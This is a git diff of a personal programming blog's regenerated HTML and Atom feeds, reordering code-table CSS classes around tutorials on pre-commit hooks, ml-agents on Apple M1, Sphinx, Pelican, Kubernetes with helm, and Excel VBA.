     <p>To install these pre-commit hooks into our workflow, firstly activate the virtual environment from within our project by running env/Scripts/activate.bat. This will activate your project's Python package management system and runtime, after which you can install packages from pip and elsewhere. For our pre-commits we install the package 'pre-commit':</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install pre-commit
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install pre-commit
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Following this, to set up the commit hooks, create a '.pre-commit-config.yaml' within your main project directory. This is where we specify which hooks we would like to run before being able to commit. Below is a sample .pre-commit-config.yaml that I use in my projects:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -87,7 +87,7 @@ Now something that I personally like to do is add this folder to your system env
     <p>On the default cookiecutter data science template with the settings as per above this will show on the pre-commit run (after you have staged changes in git (use git add -A for all)):</p>
     <p><img alt="image-4.png" class="img-fluid" src="https://jackmckew.dev/img/image-4.png"/></p>
     <p>We can already see differing opinions on code formatting from flake8's output. The black code formatter's line length is 88 characters, not 79 like PEP 8's. So we will add a pyproject.toml to the project directory where we can specify settings for the black tool:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -123,7 +123,7 @@ Now something that I personally like to do is add this folder to your system env
     </code></pre></div>
     </td></tr></tbody></table>
     <p>For any flake8 specific settings (such as error codes to ignore), we can set a .flake8 file in the project directory as well, which may look like:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    diff --git a/feeds/python.atom.xml b/feeds/python.atom.xml
    index 06e72e8a..0e1d51e7 100644
    --- a/feeds/python.atom.xml
    +++ b/feeds/python.atom.xml
    @@ -8,21 +8,21 @@
     <p>Miniconda was set up through the installation instructions listed on the website for Miniconda3 macOS Apple M1 64-bit pkg:</p>
     <p><a href="https://docs.conda.io/en/latest/miniconda.html">https://docs.conda.io/en/latest/miniconda.html</a></p>
     <p>Following this, the conda-forge is added as a channel (instructions from <a href="https://conda-forge.org/docs/user/introduction.html">https://conda-forge.org/docs/user/introduction.html</a>):</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda config --add channels conda-forge
     conda config --set channel_priority strict
     </code></pre></div>
     </td></tr></tbody></table>
     <h2 id="conda-environment">Conda environment</h2>
     <p>Big thank you to this github thread (and user @automata) for finally leading me down a successful path <a href="https://github.com/Unity-Technologies/ml-agents/issues/5797">https://github.com/Unity-Technologies/ml-agents/issues/5797</a>:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda create -n mlagents <span class="nv">python</span><span class="o">==</span><span class="m">3</span>.10.7
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda create -n mlagents <span class="nv">python</span><span class="o">==</span><span class="m">3</span>.10.7
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
     <p>Ensure you download the specific release that you are targeting; releases are managed by branches on the repo, i.e. <a href="https://github.com/Unity-Technologies/ml-agents/tree/latest_release">https://github.com/Unity-Technologies/ml-agents/tree/latest_release</a>. If you are using the gh CLI: <code>gh repo clone Unity-Technologies/ml-agents -- --branch release_20</code></p>
     </blockquote>
     <p>Next we need to edit <code>setup.py</code> found in <code>ml-agents-release_20/ml-agents/setup.py</code>, specifically line 71 to:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="s2">"torch&gt;=1.8.0,&lt;=1.12.0;(platform_system!='Windows' and python_version&gt;='3.9')"</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="s2">"torch&gt;=1.8.0,&lt;=1.12.0;(platform_system!='Windows' and python_version&gt;='3.9')"</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Now we install the ml-agents package (which has a dependency on torch) through the locally edited version:</p>
    @@ -30,7 +30,7 @@ conda config --set channel_priority strict
     <p>Theoretically, this is where we should have been done and able to run <code>mlagents-learn</code> without any more problems, but that wasn't the case. The next error we run into is:</p>
     <p><code>TypeError: Descriptors cannot not be created directly.</code></p>
     <p>Which was resolved through <a href="https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly">https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install protobuf~<span class="o">=</span><span class="m">3</span>.20
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install protobuf~<span class="o">=</span><span class="m">3</span>.20
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
    @@ -42,7 +42,7 @@ conda config --set channel_priority strict
     </blockquote>
     <p><code>ImportError: dlopen(/Users/jackmckew/miniconda3/envs/mlagentstest/lib/python3.10/site-packages/grpc/_cython/cygrpc.cpython-310-darwin.so, 0x0002): symbol not found in flat namespace '_CFRelease'</code></p>
     <p>Which was resolved through <a href="https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app">https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip uninstall grpcio -y
     conda install grpcio -y
     </code></pre></div>
    @@ -52,7 +52,7 @@ conda install grpcio -y
     <p>Finally we can run:</p>
     <p><code>mlagents-learn</code></p>
     <p>To be met with this glorious screen</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/software-development.atom.xml b/feeds/software-development.atom.xml
    index 34ea2018..53e9a9aa 100644
    --- a/feeds/software-development.atom.xml
    +++ b/feeds/software-development.atom.xml
    @@ -675,12 +675,12 @@ code, markup and prose".</p>
     <p>If there is anything I have missed, please feel free to drop a comment below and I will update this post!</p></body>Automatically Generate Documentation with Sphinx2020-02-03T00:00:00+11:002020-02-03T00:00:00+11:00Jack McKewtag:jackmckew.dev,2020-02-03:/automatically-generate-documentation-with-sphinx.html<body><h2 id="document-code-automatically-through-docstrings-with-sphinx"><strong>Document code automatically through docstrings with Sphinx</strong></h2>
     <p>This post goes into how to generate documentation for your python projects automatically with Sphinx!</p>
     <p>First off, we have to install sphinx into our virtual environment. Depending on your flavour, we can do any of the following:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install sphinx …</code></pre></div></td></tr></tbody></table></body><body><h2 id="document-code-automatically-through-docstrings-with-sphinx"><strong>Document code automatically through docstrings with Sphinx</strong></h2>
     <p>This post goes into how to generate documentation for your python projects automatically with Sphinx!</p>
     <p>First off, we have to install sphinx into our virtual environment. Depending on your flavour, we can do any of the following:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install sphinx
     conda install sphinx
    @@ -688,13 +688,13 @@ pipenv install sphinx
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Once you have installed sphinx, inside the project (let's use the directory of this blog post), we can create a docs folder in which all our documentation will live.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>mkdir docs
     <span class="nb">cd</span> docs
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Ensuring our virtual environment with sphinx installed is active, we run <code>sphinx-quickstart</code>; this tool allows us to populate some information for our documentation in a nice Q&amp;A style.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -768,27 +768,27 @@ where <span class="s2">"builder"</span> is one of the supported buil
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Now let's create an example package that we can write some documentation in.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>mkdir sphinxdemo
     <span class="nb">cd</span> sphinxdemo
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Then we create 3 files inside our example package:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__init__.py
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__init__.py
     </code></pre></div>
     </td></tr></tbody></table>
     <figure class="code">
     <figcaption><a href="/2020/documentation-with-sphinx/sphinxdemo/__init__.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="err">version = "0.1.1"</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="err">version = "0.1.1"</span>
     </code></pre></div>
     </td></tr></tbody></table>
     </figcaption></figure>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__main__.py
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__main__.py
     </code></pre></div>
     </td></tr></tbody></table>
     <figure class="code">
     <figcaption><a href="/2020/documentation-with-sphinx/sphinxdemo/__main__.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -802,12 +802,12 @@ where <span class="s2">"builder"</span> is one of the supported buil
     </code></pre></div>
     </td></tr></tbody></table>
     </figcaption></figure>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>file_functions.py
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>file_functions.py
     </code></pre></div>
     </td></tr></tbody></table>
     <figure class="code">
     <figcaption><a href="/2020/documentation-with-sphinx/sphinxdemo/file_functions.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -850,12 +850,12 @@ where <span class="s2">"builder"</span> is one of the supported buil
     <p>We need to enable the napoleon sphinx extensions in docs/conf.py for this style to work.</p>
     </blockquote>
     <p>The resulting documented code will look like:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__init__.py
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__init__.py
     </code></pre></div>
     </td></tr></tbody></table>
     <figure class="code">
     <figcaption><a href="/2020/documentation-with-sphinx/sphinxdemo_with_docs/__init__.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -869,12 +869,12 @@ where <span class="s2">"builder"</span> is one of the supported buil
     </code></pre></div>
     </td></tr></tbody></table>
     </figcaption></figure>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__main__.py
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__main__.py
     </code></pre></div>
     </td></tr></tbody></table>
     <figure class="code">
     <figcaption><a href="/2020/documentation-with-sphinx/sphinxdemo_with_docs/__main__.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -900,12 +900,12 @@ where <span class="s2">"builder"</span> is one of the supported buil
     </code></pre></div>
     </td></tr></tbody></table>
     </figcaption></figure>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>file_functions.py
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>file_functions.py
     </code></pre></div>
     </td></tr></tbody></table>
     <figure class="code">
     <figcaption><a href="/2020/documentation-with-sphinx/sphinxdemo_with_docs/file_functions.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -971,7 +971,7 @@ where <span class="s2">"builder"</span> is one of the supported buil
     <p>Our <code>conf.py</code> file for sphinx's configuration results in:</p>
     <figure class="code">
     <figcaption><span>Sphinx Configuration File conf.py</span> <a href="/2020/documentation-with-sphinx/docs/source/conf.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -1094,7 +1094,7 @@ where <span class="s2">"builder"</span> is one of the supported buil
<p>We must also set up our index.rst (reStructuredText) file with what we want to see in our documentation.</p>
     <figure class="code">
     <figcaption><span>Documentation Index File index.rst</span> <a href="/2020/documentation-with-sphinx/docs/source/index.rst">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -1156,7 +1156,7 @@ where <span class="s2">"builder"</span> is one of the supported buil
<p>To generate individual pages for our modules, classes and functions, we define separate templates; these are detailed here: <a href="https://github.com/JackMcKew/jackmckew.dev/tree/master/content/2020/documentation-with-sphinx/docs/source/_templates">autosummary templates</a></p>
     </blockquote>
<p>Next we navigate to our <code>docs</code> directory, and finally run:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>make html
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>make html
     </code></pre></div>
     </td></tr></tbody></table>
     <p>This will generate all the stubs for our documentation and compile them into HTML format.</p>
    @@ -1187,12 +1187,12 @@ where <span class="s2">"builder"</span> is one of the supported buil
     <p><a href="http://www.pelicanthemes.com/">http://www.pelicanthemes.com/</a></p>
     <p>Which lets you scroll through the various themes, and even links to the repository on github for the theme if you wish to use it. The theme I decided on was <a href="https://github.com/alexandrevicenzi/Flex">Flex by Alexandre Vicenzi</a>.</p>
<p>Applying the theme was as simple as cloning the repo (or using <a href="https://www.atlassian.com/git/tutorials/git-submodule">git submodules</a>), and adding one line of code in pelicanconf.py (generated automatically by pelican-quickstart).</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">THEME</span> <span class="o">=</span> <span class="s2">"./themes/Flex"</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">THEME</span> <span class="o">=</span> <span class="s2">"./themes/Flex"</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h4 id="plugins">Plugins</h4>
     <p>Admittedly, I just tried out all the plugins in the <a href="https://github.com/getpelican/pelican-plugins">Pelican Plugins Repository</a> until I found the combination that works for me, this ended up being:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -1240,7 +1240,7 @@ where <span class="s2">"builder"</span> is one of the supported buil
<p>Now that I had the skeleton of the website set up, I needed to bring in all the existing posts from wordpress. By following another guide within the Pelican documentation, this was a relatively simple task: <a href="http://docs.getpelican.com/en/3.6.3/importer.html">http://docs.getpelican.com/en/3.6.3/importer.html</a>. However, I did spend the time to go through each markdown file and manually remove the redundant 'wordpress' formatting tags.</p>
     <h4 id="linking-to-content">Linking to Content</h4>
<p>As one of the main tasks of this project was to consolidate articles with their content/code/analysis in one spot, during initial development I followed the guide at <a href="http://docs.getpelican.com/en/3.6.3/content.html">http://docs.getpelican.com/en/3.6.3/content.html</a>.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -1260,7 +1260,7 @@ where <span class="s2">"builder"</span> is one of the supported buil
     </code></pre></div>
     </td></tr></tbody></table>
<p>I ended up with a structure like the above, which annoyed me a bit: the content was now in one place, but still divided into 3 folders with little-to-no link between them. My goal was to have a structure like:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -1288,7 +1288,7 @@ where <span class="s2">"builder"</span> is one of the supported buil
<p>To be honest, I was actually surprised at how easy it was to get Travis CI going, and that I could spin up a virtual machine, install all the dependencies and re-build the website. However, I had a lot of trouble trying to get Travis CI to push back to the repository such that Netlify could build from it.</p>
     <p>This was later remedied by setting a repository secret variable on Travis CI as I couldn't get the secret token encrypted by Travis CI CLI (Ruby application).</p>
     <p>In essence, all that was needed was a .travis.yml file in the root directory which ended up like this:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/software.atom.xml b/feeds/software.atom.xml
    index 285886f3..96e98fb0 100644
    --- a/feeds/software.atom.xml
    +++ b/feeds/software.atom.xml
    @@ -69,7 +69,7 @@
     </ol>
     <p>For the most part, we will be making use of <code>run</code> commands, as if we are interacting with the terminal in the runtime of ubuntu (Linux). Otherwise, we can make use of pre-made actions from the marketplace. One note to be made is that the AWS Elastic Beanstalk application has been set up to run specifically on Docker, and as such we need to upload the relevant Dockerfile (production) along with any assets.</p>
     <p>The contents of the Github Action in whole will be:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -290,7 +290,7 @@
     <h2 id="setting-up-ingress-nginx">Setting up Ingress-Nginx</h2>
     <p>Before we can access our application through an IP or web address, we need to set up <code>ingress-nginx</code>, similar to how we did with <code>docker-compose</code> in previous posts. Luckily, we can make use of <code>helm</code> to add this functionality for us (provided we'd set up nginx configuration like we already have). This can be done by sshing into the terminal of our Kubernetes cluster, or similarly making use of the Cloud Shell provided by Google Cloud.</p>
<p>First we need to install helm (<a href="https://helm.sh/docs/intro/install/#from-script">https://helm.sh/docs/intro/install/#from-script</a>):</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>curl -fsSL -o get_helm.sh https://raw.githubusercontent.com/helm/helm/master/scripts/get-helm-3
     chmod <span class="m">700</span> get_helm.sh
    @@ -298,7 +298,7 @@ chmod <span class="m">700</span> get_helm.sh
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Followed by setting up <code>ingress-nginx</code> (<a href="https://kubernetes.github.io/ingress-nginx/deploy/#using-helm">https://kubernetes.github.io/ingress-nginx/deploy/#using-helm</a>):</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
     helm install my-release ingress-nginx/ingress-nginx
     </code></pre></div>
    @@ -396,7 +396,7 @@ helm install my-release ingress-nginx/ingress-nginx
     <h2 id="clusterip-service">ClusterIP Service</h2>
     <p>We need to set up a ClusterIP service for each of our deployments except the worker deployment. This will allow our services to communicate with others inside the node.</p>
     <p>To do this, we create a configuration <code>yaml</code> file:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -453,7 +453,7 @@ A <em>persistant</em> volume is not tied directly to pods, but is ti
     </tr>
     </tbody>
     </table>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -482,7 +482,7 @@ A <em>persistant</em> volume is not tied directly to pods, but is ti
     <h2 id="environment-variables">Environment Variables</h2>
<p>Some of our pods depend on environment variables being set to work correctly (eg, REDIS_HOST, PGUSER, etc). We add these using the <code>env</code> key in our <code>spec</code> &gt; <code>containers</code> configuration.</p>
     <p>For example, for our worker to connect to the redis deployment:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -504,7 +504,7 @@ A <em>persistant</em> volume is not tied directly to pods, but is ti
     <p>Note that for the value of the <code>REDIS_HOST</code> we are stating the name of the ClusterIP service we had previously set up. Kubernetes will automatically resolve this for us to be the correct IP, how neat!</p>
     <h3 id="secrets">Secrets</h3>
<p>Secrets are another type of object inside of Kubernetes that are used to store sensitive information we don't want to live in the plain text of the configuration files. We do this through a <code>kubectl</code> command:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>kubectl create secret <span class="o">[</span>secret_type<span class="o">]</span> <span class="o">[</span>secret_name<span class="o">]</span> --from-literal <span class="nv">key</span><span class="o">=</span>value
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>kubectl create secret <span class="o">[</span>secret_type<span class="o">]</span> <span class="o">[</span>secret_name<span class="o">]</span> --from-literal <span class="nv">key</span><span class="o">=</span>value
     </code></pre></div>
     </td></tr></tbody></table>
<p>There are 3 secret types: <code>generic</code>, <code>docker-registry</code> and <code>tls</code>; most of the time we'll be making use of the <code>generic</code> secret type. Similar to how we consume other services, we will be consuming the secret via the <code>secret_name</code> parameter. The names (but not the values) can always be retrieved through <code>kubectl get secrets</code>.</p>
    @@ -513,7 +513,7 @@ A <em>persistant</em> volume is not tied directly to pods, but is ti
     </blockquote>
     <h3 id="consuming-secrets-as-environment-variable">Consuming Secrets as Environment Variable</h3>
     <p>Consuming a secret as an environment variable for a container is a little different to other environment variables. As secrets can contain multiple key value pairs, we need to specify the secret and the key to retrieve the value from:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -527,7 +527,7 @@ A <em>persistant</em> volume is not tied directly to pods, but is ti
     <h2 id="ingress-service">Ingress Service</h2>
<p>The ingress service allows traffic from outside to reach our Kubernetes cluster, and thus defines how we should treat incoming requests and how to route them.</p>
     <p>The entirety of our configuration for the ingress service is:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/vba.atom.xml b/feeds/vba.atom.xml
    index 9e875ca8..dad5bd31 100644
    --- a/feeds/vba.atom.xml
    +++ b/feeds/vba.atom.xml
    @@ -89,7 +89,7 @@
<p>When I came across this problem, after researching online I stumbled across a similar question on Stackoverflow:</p>
     <p><a href="https://stackoverflow.com/questions/58381445/how-to-get-value-of-visible-cell-in-a-table-after-filtering-only-working-for-1">https://stackoverflow.com/questions/58381445/how-to-get-value-of-visible-cell-in-a-table-after-filtering-only-working-for-1</a></p>
     <p>With one of the answers from <a href="https://stackoverflow.com/users/445425/chris-neilsen">Chris Neilsen</a> being:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -158,7 +158,7 @@
     <li><code>iCol</code> - The column index we want to return</li>
     </ul>
<p>Without further ado, here is the function. Note that another function <code>GetListObject</code> is used to find the table in question; see <a href="#getlistobject-function">GetListObject Function</a> for more information on this. Otherwise you can use <code>Application.Worksheets(sheetName)</code>.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -208,7 +208,7 @@
     <h2 id="getlistobject-function">GetListObject Function</h2>
     <p>Similarly, the GetListObject function was also found on Stackoverflow, by the user <a href="https://stackoverflow.com/users/20151/andrewd">AndrewD</a>:</p>
     <p><a href="https://stackoverflow.com/questions/18030637/how-do-i-reference-tables-in-excel-using-vba">https://stackoverflow.com/questions/18030637/how-do-i-reference-tables-in-excel-using-vba</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/files/Jack_McKew_CV.pdf b/files/Jack_McKew_CV.pdf
    index baf40325..e88f7698 100644
    Binary files a/files/Jack_McKew_CV.pdf and b/files/Jack_McKew_CV.pdf differ
    diff --git a/find-nth-visible-cell-with-vba-excel.html b/find-nth-visible-cell-with-vba-excel.html
    index 0f6e8a2c..f6a96aec 100644
    --- a/find-nth-visible-cell-with-vba-excel.html
    +++ b/find-nth-visible-cell-with-vba-excel.html
    @@ -248,7 +248,7 @@ 

    Function to Find Visible Row

When I came across this problem, after researching online I stumbled across a similar question on Stackoverflow:

    https://stackoverflow.com/questions/58381445/how-to-get-value-of-visible-cell-in-a-table-after-filtering-only-working-for-1

    With one of the answers from Chris Neilsen being:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
